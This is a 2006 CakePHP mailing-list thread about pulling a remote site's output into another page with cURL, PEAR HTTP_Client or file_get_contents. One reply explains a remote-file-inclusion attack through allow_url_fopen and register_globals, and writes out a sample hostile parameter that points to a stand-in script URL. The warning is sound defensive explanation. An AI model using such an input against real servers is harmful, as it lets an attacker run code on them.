Re: Including a cakephp action result in another site
Hello, I checked with my provider and php has the curl extension. Now this is what I made: I wrote a PHP file on site B that connects to the db, retrieves the announcements inserted today, outputs data in a HTML format, close the db connection. Then in site A i did put the code for opening a curl connection (example taken from php.net) and all works. Now I have some other questions: - Where should i place in the cake directory structure this php script ? Now it is in webroot dir. - Anyone has a suggestion for a "easy to plug" marquee replacement? I need to scroll this announcements on site A in a box - Are there any suggestion about security? Thank you very much Michele --~--~-~--~~~---~--~~ You received this message because you are subscribed to the Google Groups "Cake PHP" group. To post to this group, send email to cake-php@googlegroups.com To unsubscribe from this group, send email to [EMAIL PROTECTED] For more options, visit this group at http://groups.google.com/group/cake-php?hl=en -~--~~~~--~~--~--~---
Re: Including a cakephp action result in another site
Thanks for all the reply I will try some of the advices... I hope to succeed and then show you my site in cakephp... ... and thanks again for the fantastic framework Michele --~--~-~--~~~---~--~~ You received this message because you are subscribed to the Google Groups "Cake PHP" group. To post to this group, send email to cake-php@googlegroups.com To unsubscribe from this group, send email to [EMAIL PROTECTED] For more options, visit this group at http://groups.google.com/group/cake-php?hl=en -~--~~~~--~~--~--~---
Re: Including a cakephp action result in another site
You should read up on
allow_url_fopen, and the *huge* security risk it poses if you're not
careful. You should never use any filesystem functions on remote
resources, especially if you don't control them.
Thanks for pointing this out nate ! in case there are others who didn't
know about this either, I just looked it up :
The security risk is that having allow_url_fopen also applies to
'include' and 'require'. For example in a situation where you'd have
register_globals and allow_url_fopen on, and such type of code :
include $somefile;
Then an attacker could run any code on your server calling the page
with 'somefile=http://example.com/evilscript'. This obviously an
extreme case, but more subtle attacks could be done on the same
principle.
I thought I'd point out that Cake is quite safe in this regards - while
it does use 'include' with variables (obviously, since it loads the
files associated with models/etc.) it does so in a safe way by checking
if the file is truly a file with file_exists first (url_fopen does not
apply to file_exists). For instance in loadModel :
if (file_exists($path . $name . '.php')) {
require($path . $name . '.php');
// .
}
But you never know how code evolves over time - and since it's a risk
it is best to have allow_url_fopen off.
Sorry for the bad advice :(
Anselm
--~--~-~--~~~---~--~~
You received this message because you are subscribed to the Google Groups "Cake
PHP" group.
To post to this group, send email to cake-php@googlegroups.com
To unsubscribe from this group, send email to [EMAIL PROTECTED]
For more options, visit this group at
http://groups.google.com/group/cake-php?hl=en
-~--~~~~--~~--~--~---
Re: Including a cakephp action result in another site
anselm wrote: > See http://www.php.net/manual/en/function.file-get-contents.php That's really not such a good idea. You should read up on allow_url_fopen, and the *huge* security risk it poses if you're not careful. You should never use any filesystem functions on remote resources, especially if you don't control them. --~--~-~--~~~---~--~~ You received this message because you are subscribed to the Google Groups "Cake PHP" group. To post to this group, send email to cake-php@googlegroups.com To unsubscribe from this group, send email to [EMAIL PROTECTED] For more options, visit this group at http://groups.google.com/group/cake-php?hl=en -~--~~~~--~~--~--~---
RE: Including a cakephp action result in another site
No way, curl is much faster than file_get_contents(). http://monitor.trucex.com/curltest.php Some examples of that test output: --- Calculating 10 queries to http://www.flickr.com/ ..cURL took 0.953103 seconds. ..file_get_contents() took 2.283331 seconds. Calculating 10 queries to http://www.yahoo.com/ ..cURL took 0.713752 seconds. ..file_get_contents() took 1.592310 seconds. Calculating 10 queries to http://www.ebay.com/ ..cURL took 0.831023 seconds. ..file_get_contents() took 2.827789 seconds. Calculating 10 queries to http://www.godaddy.com/ ..cURL took 0.359577 seconds. ..file_get_contents() took 8.521148 seconds. Calculating 10 queries to http://www.php.net/ ..cURL took 0.710871 seconds. ..file_get_contents() took 1.958811 seconds. --- -MI --- Remember, smart coders answer ten questions for every question they ask. So be smart, be cool, and share your knowledge. BAKE ON! -Mensaje original- De: cake-php@googlegroups.com [mailto:[EMAIL PROTECTED] En nombre de anselm Enviado el: Martes, 19 de Diciembre de 2006 07:53 a.m. Para: Cake PHP Asunto: Re: Including a cakephp action result in another site If you just want to grab the content, and display it as it is the fastest way is to use file_get_contents (provided you have fopen wrappers installed) : --~--~-~--~~~---~--~~ You received this message because you are subscribed to the Google Groups "Cake PHP" group. To post to this group, send email to cake-php@googlegroups.com To unsubscribe from this group, send email to [EMAIL PROTECTED] For more options, visit this group at http://groups.google.com/group/cake-php?hl=en -~--~~~~--~~--~--~---
Re: Including a cakephp action result in another site
If you want to pass data through/have cookies/etc. then PEAR
HTTP_Client is probably the way to go. If you just want to grab the
content, and display it as it is the fastest way is to use
file_get_contents (provided you have fopen wrappers installed) :
echo file_get_contents('http://www.example.com');
See http://www.php.net/manual/en/function.file-get-contents.php
--~--~-~--~~~---~--~~
You received this message because you are subscribed to the Google Groups
"Cake PHP" group.
To post to this group, send email to cake-php@googlegroups.com
To unsubscribe from this group, send email to [EMAIL PROTECTED]
For more options, visit this group at
http://groups.google.com/group/cake-php?hl=en
-~--~~~~--~~--~--~---
Re: Including a cakephp action result in another site
M ha scritto: > it B). This announce should be scrolling (I think I can use the tag > MARQUEE). please, please.. don't do that. http://www.mcli.dist.maricopa.edu/tut/tut17.html --~--~-~--~~~---~--~~ You received this message because you are subscribed to the Google Groups "Cake PHP" group. To post to this group, send email to cake-php@googlegroups.com To unsubscribe from this group, send email to [EMAIL PROTECTED] For more options, visit this group at http://groups.google.com/group/cake-php?hl=en -~--~~~~--~~--~--~---
RE: Including a cakephp action result in another site
Or better yet use PEAR HTTP_Client:
http://pear.php.net/package/HTTP_Client
Quick way:
require_once ('HTTP/Client.php');
$request =& new HTTP_Client();
$result =& $request->get('http://www.url.com');
if (PEAR::isError($result))
{
die('Houston, we have a problem');
}
else
{
$response =& $request->currentResponse();
echo 'BODY IS: ' . htmlentities($response['body']);
}
-MI
---
Remember, smart coders answer ten questions for every question they ask.
So be smart, be cool, and share your knowledge.
BAKE ON!
--~--~-~--~~~---~--~~
You received this message because you are subscribed to the Google Groups
"Cake PHP" group.
To post to this group, send email to cake-php@googlegroups.com
To unsubscribe from this group, send email to [EMAIL PROTECTED]
For more options, visit this group at
http://groups.google.com/group/cake-php?hl=en
-~--~~~~--~~--~--~---
Re: Including a cakephp action result in another site
On 12/19/06, M <[EMAIL PROTECTED]> wrote: > The problem is that I do not know how can i "include" in site A the > "response" returned from site B? You can try using cURL if your server has it installed: http://www.php.net/curl or use fsockopen as a fallback if cURL is not present: http://www.php.net/fsockopen What you do is open a connection to site B. Read the response and place it into a string and echo it into your page. Things to consider: 1. If you are gathering details about the URL on site B from user input (e.g. GET, POST), make sure you filter it properly. Or else it would be possible to execute a cross-site scripting attack (e.g. bad guy sets one of the details to point to his website that outputs javascript). 2. Don't forget to close the connection you made once you are done reading. Otherwise you will run into resource exhaustion problems depending on your setup. Hope this helps. -- _nimrod_a_abing_ [?] http://abing.gotdns.com --~--~-~--~~~---~--~~ You received this message because you are subscribed to the Google Groups "Cake PHP" group. To post to this group, send email to cake-php@googlegroups.com To unsubscribe from this group, send email to [EMAIL PROTECTED] For more options, visit this group at http://groups.google.com/group/cake-php?hl=en -~--~~~~--~~--~--~---
Including a cakephp action result in another site
Hello, I have the following newbie question: I would like in to show in a little box on a site A all the announces inserted today in a database that resides on another server (let's call it B). This announce should be scrolling (I think I can use the tag MARQUEE). I think I have to make a cakephp function (on site B ) in a controller that extracts from the mysql DB the announce and then render a views. The problem is that I do not know how can i "include" in site A the "response" returned from site B? Thanks -- Michele --~--~-~--~~~---~--~~ You received this message because you are subscribed to the Google Groups "Cake PHP" group. To post to this group, send email to cake-php@googlegroups.com To unsubscribe from this group, send email to [EMAIL PROTECTED] For more options, visit this group at http://groups.google.com/group/cake-php?hl=en -~--~~~~--~~--~--~---
